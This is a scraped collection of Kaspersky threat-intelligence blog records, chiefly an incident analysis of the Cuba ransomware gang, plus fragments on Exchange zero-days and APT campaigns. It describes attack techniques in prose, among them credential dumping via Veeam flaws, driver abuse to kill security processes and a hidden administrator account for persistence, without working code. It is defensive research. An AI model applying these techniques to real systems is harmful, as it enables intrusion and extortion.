Make sure you can quickly access it in an emergency.\n * Use solutions like [Kaspersky Endpoint Detection and Response](<https://www.kaspersky.com/enterprise-security/endpoint-detection-response-edr>) and the [Kaspersky Managed Detection and Response](<https://www.kaspersky.com/enterprise-security/managed-detection-and-response>) service which help to identify and stop the attack in the early stages, before the attackers achieve their goals.\n * Use a reliable endpoint security solution such as Kaspersky Endpoint Security for Business that is powered by exploit prevention, behavior detection and a remediation engine that is able to roll back malicious actions. KESB also has self-defense mechanisms that can prevent its removal by cybercriminals.", "cvss3": {}, "published": "2021-03-04T17:20:57", "type": "securelist", "title": "Zero-day vulnerabilities in Microsoft Exchange Server", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-03-04T17:20:57", "id": "SECURELIST:403B2D76CFDBDAB0862F6860A95E54B4", "href": "https://securelist.com/zero-day-vulnerabilities-in-microsoft-exchange-server/101096/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-10-17T09:24:48", "description": "\n\n## Introduction\n\nKnowledge is our best weapon in the fight against cybercrime. An understanding of how various gangs operate and what tools they use helps build competent defenses and investigate incidents. This report takes a close look at the history of the Cuba group, and their attack tactics, techniques and procedures. We hope this article will help you to stay one step ahead of threats like this one.\n\n## Cuba ransomware gang\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08140902/Cuba_ransomware_01.png>)\n\nCuba data leak site\n\nThe group's offensives first got on our radar in late 2020. 
Back then, the cybercriminals had not yet adopted the moniker "Cuba"; they were known as "Tropical Scorpius".\n\nCuba mostly targets organizations in the United States, Canada and Europe. The gang has scored a series of resonant attacks on oil companies, [financial services](<https://www.bleepingcomputer.com/news/security/us-cities-disclose-data-breaches-after-vendors-ransomware-attack/>), [government agencies](<https://techcrunch.com/2022/08/31/montenegro-ransomware-attack-embassy-warning/>) and healthcare providers.\n\nAs with most cyberextortionists lately, the Cuba gang encrypts victims' files and demands a ransom in exchange for a decryption key. The gang infamously uses complex tactics and techniques to penetrate victim networks, such as exploitation of software vulnerabilities and social engineering. They have been known to use compromised remote desktop (RDP) connections for initial access.\n\nThe Cuba gang's exact origins and the identities of its members are unknown, although some researchers believe it might be a successor to another ill-famed extortion gang, Babuk. The Cuba group, like many others of its kind, is a ransomware-as-a-service (RaaS) outfit, letting its partners use the ransomware and associated infrastructure in exchange for a share of any ransom they collect.\n\nThe group has changed names several times since its inception. We are currently aware of the following aliases it has used:\n\n * ColdDraw\n * Tropical Scorpius\n * Fidel\n * Cuba\n\nThis past February, we came across another name for the gang \u2014 "V Is Vendetta", which deviated from the hackers' favorite Cuban theme. 
This might have been a moniker used by a sub-group or affiliate.\n\nThere is an obvious connection with the Cuba gang: the newly discovered group's website is hosted in the Cuba domain:\n\n_http[:]//test[.]cuba4ikm4jakjgmkezytyawtdgr2xymvy6nvzgw5cglswg3si76icnqd[.]onion/_\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08140959/Cuba_ransomware_02.png>)\n\nWebsite of V IS VENDETTA\n\nCuba remains active as at the time of writing this, and we keep hearing about new extortion victims.\n\n## Victimology\n\n_In this section, we used data consensually provided by our users and information about victims from open sources, such as other security vendors' reports and the data leak site of the ransomware gang itself._\n\nThe group has attacked numerous companies around the world. Industry affiliation does not seem to be a factor: victims have included retailers, financial and logistical services, government agencies, manufacturers, and others. In terms of geography, most of the attacked companies have been located in the United States, but there have been victims in Canada, Europe, Asia and Australia.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08141048/Cuba_ransomware_03.png>)\n\nGeographic distribution of Cuba victims\n\n## Ransomware\n\nThe Cuba ransomware is a single file without additional libraries. Samples often have a forged compilation timestamp: those found in 2020 were stamped with June 4, 2020, and more recent ones, June 19th, 1992.\n\n## Cuba extortion model\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08141130/Cuba_ransomware_04.png>)\n\nExtortion models\n\nFour extortion models exist today in terms of tools used for pressuring the victim.\n\n * Single extortion: encrypting data and demanding a ransom just for decryption.\n * Double extortion: besides encrypting, attackers steal sensitive information. 
They threaten to both withhold the encryption key and publish the stolen information online unless the victim pays up. This is the most popular model among ransomware gangs today.\n * Triple extortion: adding a threat to expose the victim's internal infrastructure to DDoS attacks. The model became widespread after the LockBit gang got [DDoS'ed](<https://techcrunch.com/2022/08/22/entrust-lockbit-ddos-ransomware/>), possibly by a victim. After getting targeted, the hackers realized that DDoS was an effective pressure tool, something they [stated openly](<https://www.bleepingcomputer.com/news/security/lockbit-ransomware-gang-gets-aggressive-with-triple-extortion-tactic/>), setting an example for others. To be fair, [isolated cases of triple extortion](<https://www.bleepingcomputer.com/news/security/ransomware-gangs-add-ddos-attacks-to-their-extortion-arsenal/>) predate the LockBit case.\n * The fourth model is the least common one, as it implies maximum pressure and is thus more costly. It adds spreading news of the breach among the victim's investors, shareholders and customers. DDoS attacks in that case are not necessary. This model is exemplified by the recent [hack of Bluefield University in Virginia](<https://www.bleepingcomputer.com/news/security/ransomware-gang-hijacks-university-alert-system-to-issue-threats/>), where the AvosLocker ransomware gang hijacked the school's emergency broadcast system to send students and staff SMS texts and email alerts that their personal data had been stolen. The hackers urged not to trust the school's management, who they said were concealing the true scale of the breach, and to make the situation public knowledge as soon as possible.\n\nThe Cuba group is using the classic double extortion model, encrypting data with the Xsalsa20 symmetric algorithm, and the encryption key, with the RSA-2048 asymmetric algorithm. 
This is known as hybrid encryption, a cryptographically secure method that prevents decryption without the key.\n\nCuba ransomware samples avoid encrypting files with the following name extensions: .exe, .dll, .sys, .ini, .lnk, .vbm and .cuba, and the following folders:\n\n * \\windows\\\n * \\program files\\microsoft office\\\n * \\program files (x86)\\microsoft office\\\n * \\program files\\avs\\\n * \\program files (x86)\\avs\\\n * \\$recycle.bin\\\n * \\boot\\\n * \\recovery\\\n * \\system volume information\\\n * \\msocache\\\n * \\users\\all users\\\n * \\users\\default user\\\n * \\users\\default\\\n * \\temp\\\n * \\inetcache\\\n * \\google\\\n\nThe ransomware saves time by searching for, and encrypting, Microsoft Office documents, images, archives and others in the %AppData%\\Microsoft\\Windows\\Recent\\ directory, rather than all files on the device. It also terminates all SQL services to encrypt any available databases. It looks for data both locally and inside network shares.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08141209/Cuba_ransomware_05.png>)\n\nList of services that the Cuba ransomware terminates\n\nBesides encrypting, the group steals sensitive data that it discovers inside the victim's organization. The type of data that the hackers are after depends on the industry that the target company is active in, but in most cases, they exfiltrate the following:\n\n * Financial documents\n * Bank statements\n * Company accounts details\n * Source code, if the company is a software developer\n\n## Arsenal\n\nThe group employs both well-known, "classic" credential access tools, such as mimikatz, and self-written applications. 
It exploits vulnerabilities in software used by the victim companies: mostly known issues, such as the combination of [ProxyShell](<https://www.computerweekly.com/news/252505767/Half-of-MS-Exchange-servers-at-risk-in-ProxyShell-debacle>) and [ProxyLogon](<https://www.computerweekly.com/news/252497200/Emergency-patch-addresses-MS-Exchange-Server-zero-days>) for attacking Exchange servers, and security holes in the Veeam data backup and recovery service.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08141240/Cuba_ransomware_06.png>)\n\n**Malware**\n\n * Bughatch\n * Burntcigar\n * Cobeacon\n * Hancitor (Chanitor)\n * Termite\n * SystemBC\n * Veeamp\n * Wedgecut\n * RomCOM RAT\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08141310/Cuba_ransomware_07.png>)\n\n**Tools**\n\n * Mimikatz\n * PowerShell\n * PsExec\n * Remote Desktop Protocol\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08141345/Cuba_ransomware_08.png>)\n\n**Vulnerabilities**\n\nProxyShell:\n\n * CVE-2021-31207\n * CVE-2021-34473\n * CVE-2021-34523\n\nProxyLogon:\n\n * CVE-2021-26855\n * CVE-2021-26857\n * CVE-2021-26858\n * CVE-2021-27065\n\nVeeam vulnerabilities:\n\n * [CVE-2022-26501](<https://vulners.com/cve/CVE-2022-26501>)\n * [CVE-2022-26504](<https://vulners.com/cve/CVE-2022-26504>)\n * [CVE-2022-26500](<https://vulners.com/cve/CVE-2022-26500>)\n\n[ZeroLogon](<https://en.wikipedia.org/wiki/Zerologon>):\n\n * CVE-2020-1472\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08141416/Cuba_ransomware_09.png>)\n\nMapping of the attack arsenal to MITRE ATT&CK\u00ae tactics\n\n## Profits\n\nThe incoming and outgoing payments in the bitcoin wallets whose identifiers the hackers provide in their ransom notes exceed a total of 3,600 BTC, or more than $103,000,000 converted at the rate of $28,624 for 1 BTC. 
The gang owns numerous wallets, constantly transferring funds between these, and uses bitcoin mixers: services that send bitcoins through a series of anonymous transactions to make the origin of the funds harder to trace.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08141450/Cuba_ransomware_10.png>)\n\nPart of the transaction tree in the BTC network\n\n## Investigation of a Cuba-related incident and analysis of the malware\n\n### Host: SRV_STORAGE\n\nOn December 19, we spotted suspicious activity on a customer host, which we will refer to as "SRV_STORAGE" in this report. Telemetry data showed three suspicious new files:\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08141536/Cuba_ransomware_11.png>)\n\nSuspicious events in the telemetry data as discovered by the Kaspersky SOC\n\nAn analysis of kk65.bat suggested that it served as a stager that initiated all further activity by starting rundll32 and loading the komar65 library into it, which runs the callback function DLLGetClassObjectGuid.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08141606/Cuba_ransomware_12.png>)\n\nContents of the .bat file that we found\n\nLet us take a look inside the suspicious DLL.\n\n#### Bughatch\n\nThe komar65.dll library is also known as "Bughatch", a name it was given in a [report](<https://www.mandiant.com/resources/blog/unc2596-cuba-ransomware>) by Mandiant.\n\nThe first thing that caught our attention was the path to the PDB file. There's a folder named "mosquito" in it, which translates into Russian as "komar". 
The latter is a part of the DLL name, suggesting the gang may include Russian speakers.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08141652/Cuba_ransomware_13.png>)\n\nPath to the komar65.dll PDB file\n\nThe DLL code presents Mozilla/4.0 as the user agent when connecting to the following two addresses:\n\n * com, apparently used for checking external connectivity\n * The gang's command-and-control center. The malware will try calling home if the initial ping goes through.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08141743/Cuba_ransomware_14.png>)\n\nAnalysis of komar65.dll\n\nThis is the kind of activity we observed on the infected host. After Bughatch successfully established a connection with the C2 server, it began collecting data on network resources.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08141821/Cuba_ransomware_15.png>)\n\nBughatch activity\n\nLooking into the C2 servers, we found that in addition to Bughatch, these spread modules that extend the malware's functionality. One of those collects information from the infected system and sends it back to the server in the form of an HTTP POST request.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08141859/Cuba_ransomware_16.jpeg>)\n\nFiles we found on the Cuba C2 servers\n\nOne could think of Bughatch as a backdoor of sorts, deployed inside the process memory and executing a shellcode block within the space it was allocated with the help of Windows APIs (VirtualAlloc, CreateThread, WaitForSingleObject), to then connect to the C2 and await further instructions. 
In particular, the C2 may send a command to download further malware, such as Cobalt Strike Beacon, Metasploit, or further Bughatch modules.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08141930/Cuba_ransomware_17.png>)\n\nBughatch operating diagram\n\n### SRV_Service host\n\n#### Veeamp\n\nAfter some time, we found a malicious process started on a neighboring host; we dubbed this "SRV_Service":\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08142027/Cuba_ransomware_18.png>)\n\nMalicious process starting\n\n**Veeamp.exe** is a custom-built data dumper written in C#, which leverages security flaws in the Veeam backup and recovery service to connect to the VeeamBackup SQL database and grab account credentials.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08142101/Cuba_ransomware_19.png>)\n\nAnalysis of Veeamp\n\n**Veeamp** exploits the following Veeam vulnerabilities: CVE-2022-26500, CVE-2022-26501, CVE-2022-26504. The first two allow an unauthenticated user to remotely execute arbitrary code, and the third lets domain users do the same. After any of the three are exploited, the malware outputs the following in the control panel:\n\n * User name\n * Encrypted password\n * Decrypted password\n * User description in the Credentials table of Veeam: group membership, permissions and so on\n\nThe malware is not exclusive to the Cuba gang. 
We spotted it also in attacks by other groups, such as Conti and [Yanluowang](<https://securelist.com/how-to-recover-files-encrypted-by-yanluowang/106332/>).\n\nActivity we saw on SRV_Service after Veeamp finished its job was similar to what we had observed on SRV_STORAGE with Bughatch:\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08142319/Cuba_ransomware_20.png>)\n\nBughatch activity on SRV_Service\n\nAs was the case with SRV_STORAGE, the malware dropped three files into the temp folder, and then executed these in the same order, connecting to the same addresses.\n\n#### Avast Anti-Rootkit driver\n\nAfter Bughatch successfully established a connection to its C2, we watched as the group used an increasingly popular technique: Bring Your Own Vulnerable Driver (BYOVD).\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08153116/Cuba_ransomware_21.png>)\n\nExploiting a vulnerable driver\n\nThe malicious actors install the vulnerable driver in the system and subsequently use it to various ends, such as terminating processes or evading defenses through privilege escalation to kernel level.\n\nHackers are drawn to vulnerable drivers because they all run in kernel mode, with a high level of system access. Besides, a legitimate driver with a digital signature will not raise any red flags with security systems, helping the attackers to stay undetected for longer.\n\nDuring the attack, the malware created three files in the temp folder:\n\n * **aswarpot.sys**: a legitimate anti-rootkit driver by Avast that has two vulnerabilities: [CVE-2022-26522](<https://vulners.com/cve/CVE-2022-26522>) and [CVE-2022-26523](<https://vulners.com/cve/CVE-2022-26523>), which allow a user with limited permissions to run code at kernel level.\n * **KK.exe**: malware known as Burntcigar. 
The file we found was a new variety that used the flawed driver to terminate processes.\n * **av.bat** batch script: a stager that helps the kernel service to run the Avast driver and executes Burntcigar.\n\nAnalysis of the BAT file and telemetry data suggests that av.bat uses the sc.exe utility to create a service named "aswSP_ArPot2", specifying the path to the driver in the C:\\windows\\temp\\ directory and the service type as kernel service. The BAT file then starts the service with the help of the same sc.exe utility and runs KK.exe, which connects to the vulnerable driver.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08153226/Cuba_ransomware_22.png>)\n\nContents of the .bat file that we found\n\n#### Burntcigar\n\nThe first thing we noticed while looking into Burntcigar was the path to the PDB file, which contained a folder curiously named "Musor" (the Russian for "trash"), more indication that the members of the Cuba gang may speak Russian.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08153308/Cuba_ransomware_23.png>)\n\nPath to the KK.exe PDB file\n\nWe further discovered that the sample at hand was a new version of Burntcigar, undetectable by security systems at the time of the incident. 
The hackers had apparently updated the malware, as in the wake of previous attacks, many vendors were able to easily detect the logic run by older versions.\n\nYou may have noticed that in the screenshot of our sample below, all data about processes to be terminated is encrypted, whereas older versions openly displayed the names of all processes that the attackers wanted stopped.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08153352/Cuba_ransomware_24.png>)\n\nComparison between the old and new version of Burntcigar\n\nThe malware searches for process names that suggest a relation to popular AV or EDR products and adds their process IDs to the stack to terminate later.\n\nBurntcigar uses the DeviceIoControl function to access the vulnerable Avast driver, specifying the location of the code that contains the security issue as an execution option. The piece of code contains the ZwTerminateProcess function, which the attackers use for terminating processes.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08153438/Cuba_ransomware_25.png>)\n\nAnalysis of Burntcigar\n\nFortunately, our product's self-defense was able to cope with the malware by blocking all hooks to the driver.\n\nLater, we discovered similar activity exploiting the Avast anti-rootkit driver on the Exchange server and the SRV_STORAGE host. In both cases, the attackers used a BAT file to install the insecure driver and then start Burntcigar.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08153516/Cuba_ransomware_26.png>)\n\nBurntcigar activity on the neighboring hosts\n\n### SRV_MAIL host (Exchange server)\n\nOn December 20, the customer granted our request to add the Exchange server to the scope of monitoring. The host must have been used as an entry point to the customer network, as the server was missing critical updates, and it was susceptible to most of the group's initial access vectors. 
In particular, SRV_MAIL had the ProxyLogon, ProxyShell and Zerologon vulnerabilities still unremediated. This is why we believe that the attackers penetrated the customer network through the Exchange server.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08153603/Cuba_ransomware_27.png>)\n\nTelemetry data starts coming in\n\nOn SRV_MAIL, the SqlDbAdmin user showed the same kind of activity as that which we had observed on the previous hosts.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08153645/Cuba_ransomware_28.png>)\n\nMalicious activity by SqlDbAdmin\n\nWe found that the attackers were using the legitimate gotoassistui.exe tool for transferring malicious files between the infected hosts.\n\nGoToAssist is an RDP support utility often used by technical support teams, but the application is often abused to bypass any security defenses or response teams when moving files between systems.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08153724/Cuba_ransomware_29.png>)\n\nSending malicious files via gotoassistui.exe\n\nWe also found that new Bughatch samples were being executed. These used slightly different file names, callback functions and C2 servers, as our systems were successfully blocking older versions of the malware at that time.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08153814/Cuba_ransomware_30.png>)\n\nBughatch activity\n\n#### SqlDbAdmin\n\nWe wondered who that SqlDbAdmin was. The answer came through a suspicious DLL, addp.dll, which we found manually on a compromised host.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08153857/Cuba_ransomware_31.png>)\n\nSuspicious dynamic library\n\nWe found that it used the WIN API function NetUserAdd to create the user. 
The name and password were hard-coded inside the DLL.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08153937/Cuba_ransomware_32.png>)\n\nAnalysis of addp.dll\n\nAs we looked further into the library, we found that it used the **RegCreateKey** function to enable RDP sessions for the newly created user by modifying a registry setting. The library then added the user to the Special Account registry tree to hide it from the system login screen, an interesting and fairly unconventional persistence technique. In most cases, bad actors add new users with the help of scripts that security products rarely miss.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08154040/Cuba_ransomware_33.png>)\n\nAnalysis of addp.dll\n\n#### Cobalt Strike\n\nWe found a suspicious DLL, ion.dll, running on the Exchange server as part of the rundll32 process with unusual execution options. At first, we figured that the activity was similar to what we had earlier seen with Bughatch. However, further analysis showed that the library was, in fact, a Cobalt Strike Beacon.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08154119/Cuba_ransomware_34.png>)\n\nExecution of the suspicious ion.dll file\n\nWhen we were looking at the ion.dll code, what caught our attention were the execution settings and a function that uses the Cobalt Strike configuration. The library used the VirtualAlloc function for allocating process memory in which to execute the Cobalt Strike Beacon payload later.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08154153/Cuba_ransomware_35.png>)\n\nAnalysis of ion.dll\n\nAll configuration data was encrypted, but we did find the function used for decrypting that. 
To find the Cobalt Strike C2 server, we inspected a rundll32 memory dump with ion.dll loaded into it, running with the same settings it did on the victim host.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08154225/Cuba_ransomware_36.png>)\n\nMemory dump of rundll32\n\nFinding out the name of the C2 helped us to locate the history of communications with that server within the telemetry data. After the malware connected to the C2, it downloaded two suspicious files into the Windows folder on the infected server and then executed these. Unfortunately, we were not able to obtain the two files for analysis, as the hackers had failed to disable security at the previous step, and the files were wiped off the infected host. We do believe, though, that what we were dealing with was the ransomware itself.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08154301/Cuba_ransomware_37.png>)\n\nCommunications with the attackers' C2 server\n\nThe customer promptly isolated the affected hosts and forwarded the incident to the Kaspersky Incident Response team for further investigation and search for possible artifacts. This was the last we saw of the malicious actor's activity in the customer system. The hosts avoided encryption thanks to the customer following our recommendations and directions, and responding to the incident in time.\n\n## New malware\n\nWe found that VirusTotal contained new samples of the Cuba malware with the same file metadata as the ones in the incident described above. Some of those samples had successfully evaded detection by all cybersecurity vendors. We ran our analysis on each of the samples. As you can see from the screenshot below, these are new versions of Burntcigar using encrypted data for anti-malware evasion. 
We have made Yara rules that detect these new samples, and we are providing these in the attachment to this article.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08154344/Cuba_ransomware_38.png>)\n\nNew malware samples\n\n## BYOVD (Bring Your Own Vulnerable Driver)\n\nWe will now take a closer look at an attack that uses insecure drivers, which we observed as we investigated the incident and which is currently growing in popularity as various APT and ransomware gangs add it to their arsenals.\n\nBring Your Own Vulnerable Driver (BYOVD) is a type of attack where the bad actor uses legitimate signed drivers that are known to contain a security hole to execute malicious actions inside the system. If successful, the attacker will be able to exploit the vulnerabilities in the driver code to run any malicious actions at kernel level!\n\nUnderstanding why this is one of the most dangerous kinds of attacks takes a quick refresher on what drivers are. A driver is a type of software that acts as an intermediary between the operating system and the device. The driver converts OS instructions into commands that the device can interpret and execute. A further use of drivers is supporting applications or features that the operating system originally lacks. As you can see from the image below, the driver is a layer of sorts between user mode and kernel mode.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08154422/Cuba_ransomware_39.png>)\n\nUser mode and kernel mode interaction diagram. Source: \n<https://learn.microsoft.com/en-us/windows-hardware/drivers/gettingstarted/user-mode-and-kernel-mode>\n\nApplications running in user mode have fewer privileges to control the system. All they can get access to is a virtualized memory area that is isolated and protected from the rest of the system. The driver runs inside the kernel memory, and it can execute any operations just like the kernel itself. 
The driver can get access to critical security structures and modify those. Modifications like that make the system liable to attacks that use privilege escalation, disabling of OS security services, and arbitrary reading and writing.\n\nThe [Lazarus](<https://www.bleepingcomputer.com/news/security/lazarus-hackers-abuse-dell-driver-bug-using-new-fudmodule-rootkit/>) gang made use of that technique in 2021 as they gained write access to kernel memory and disabled Windows security features by abusing a Dell driver that contained the [CVE-2021-21551](<https://vulners.com/cve/CVE-2021-21551>) vulnerability.\n\nThere is no sure-fire defense against legitimate drivers, because any driver could prove to have a security flaw. Microsoft has published a list of recommendations to protect against this type of technique:\n\n * Enable Hypervisor-Protected Code Integrity.\n * Enable Memory Integrity.\n * Enable validation of driver digital signatures.\n * Use the [vulnerable driver blocklist](<https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules>).\n\nHowever, [studies](<https://habr.com/ru/companies/kaspersky/articles/693840/>) suggest that the recommendations are irrelevant even with every Windows protection feature enabled, and attacks like these go through anyway.\n\nTo counter this technique, many security vendors started adding a self-defense module into their products that prevents malware from terminating processes and blocks every attempt at exploiting vulnerable drivers. Our [products](<https://www.kaspersky.com/small-to-medium-business-security/endpoint-select>) have that feature too, and it proved effective during the incident.\n\n## Conclusion\n\nThe Cuba cybercrime gang employs an extensive arsenal of both publicly available and custom-made tools, which it keeps up to date, and various techniques and methods including fairly dangerous ones, such as BYOVD. 
Combating attacks at this level of complexity calls for sophisticated technology capable of detecting advanced threats and protecting security features from being disabled, and a massive, continuously updated threat knowledge base that helps to detect malicious artifacts manually.\n\nThe incident detailed in this article shows that investigation of real-life cyberattacks and incident response, such as Managed Detection and Response (MDR), are sources of the latest information about malicious tactics, techniques and procedures. In particular, during this investigation, we discovered new and previously undetected samples of the Cuba malware, and artifacts suggesting that at least some of the gang members spoke Russian.\n\nThat said, effective investigation and response begin with knowledge of current cyberthreats, which is available from Threat Intelligence services. At Kaspersky, the Threat Intelligence and MDR teams work closely while exchanging data and enhancing their services all the time.\n\n## Appendix\n\nSigma and YARA rules: <https://github.com/BlureL/SigmaYara-Rules> \nIndicators of Compromise: [Download PDF](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/14105934/Cuba-ransomware-IoCs-02.pdf>) \nMitre ATT&CK matrices: [Download PDF](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/11095522/Cuba-ransomware-TTPs.pdf>)", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2023-09-11T10:00:26", "type": "securelist", "title": "From Caribbean shores to your devices: analyzing Cuba ransomware", "bulletinFamily": "blog", "cvss2": 
{"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1472", "CVE-2021-21551", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065", "CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523", "CVE-2022-26500", "CVE-2022-26501", "CVE-2022-26504", "CVE-2022-26522", "CVE-2022-26523"], "modified": "2023-09-11T10:00:26", "id": "SECURELIST:8499F8DA2C6A39EA56D9B664EE7B6360", "href": "https://securelist.com/cuba-ransomware/110533/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-05-31T11:03:47", "description": "\n\n## Targeted attacks\n\n### Putting the 'A' into APT\n\nIn December, SolarWinds, a well-known IT managed services provider, fell victim to a sophisticated supply-chain attack. The company's Orion IT, a solution for monitoring and managing customers' IT infrastructure, was compromised by threat actors. This resulted in the deployment of a custom backdoor, named Sunburst, on the networks of more than 18,000 SolarWinds customers, including many large corporations and government bodies, in North America, Europe, the Middle East and Asia.\n\nOne thing that sets this campaign apart from others, is the peculiar victim profiling and validation scheme. Out of the 18,000 Orion IT customers affected by the malware, it seems that only a handful were of interest to the attackers. This was a sophisticated attack that employed several methods to try to remain undetected for as long as possible. 
For example, before making the first internet connection to its C2s, the Sunburst malware lies dormant for up to two weeks, preventing easy detection of this behaviour in sandboxes. In [our initial report on Sunburst](<https://securelist.com/sunburst-connecting-the-dots-in-the-dns-requests/99862/>), we examined the method used by the malware to communicate with its C2 (command-and-control) server and the protocol used to upgrade victims for further exploitation.\n\nFurther investigation of the Sunburst backdoor revealed several [features that overlap with a previously identified backdoor known as Kazuar](<https://securelist.com/sunburst-backdoor-kazuar/99981/>), a .NET backdoor first reported in 2017 and tentatively linked to the Turla APT group.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/01/08095035/Sunburst_backdoor_Kazuar_01.png>)\n\nThe shared features between Sunburst and Kazuar include the victim UID generation algorithm, code similarities in the initial sleep algorithm and the extensive usage of the FNV1a hash to obfuscate string comparisons. There are several possibilities: Sunburst may have been developed by the same group as Kazuar; the developers of Sunburst may have adopted some ideas or code from Kazuar; both groups obtained their malware from the same source; some Kazuar developers moved to another team, taking knowledge and tools with them; or the developers of Sunburst introduced these links as a form of false flag. Hopefully, further analysis will make things clearer.\n\n### Lazarus targets the defence industry\n\nWe have observed numerous activities of the Lazarus group over many years, with the threat actor changing targets depending on its objectives. Over the last two years, we have tracked Lazarus's use of ThreatNeedle, an advanced malware cluster of Manuscrypt (aka NukeSped), to target several industries. 
While investigating [attacks on the defense industry](<https://securelist.com/lazarus-threatneedle/100803/>) in mid-2020, we were able to observe the complete life-cycle of an attack, uncovering more technical details and links to the group's other campaigns.\n\nLazarus made use of COVID-19 themes in its spear-phishing emails, embellishing them with personal information gathered using publicly available sources. Once the victim opens an infected document and agrees to enable macros, the malware is dropped onto the system and proceeds to a multi-stage deployment procedure.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145116/lazarus_threatneedle_07.png>)\n\nAfter gaining an initial foothold, the attackers gathered credentials and moved laterally, seeking crucial assets in the victim's environment. They overcame network segmentation by gaining access to an internal router machine and configuring it as a proxy server, allowing them to exfiltrate stolen data from the victim's intranet to their remote server.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/24163703/lazarus_threatneedle_09.png>)[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/24164015/lazarus_threatneedle_12.png>)\n\nWe have been tracking ThreatNeedle malware for more than two years and are highly confident that this malware cluster is attributed only to the Lazarus group. 
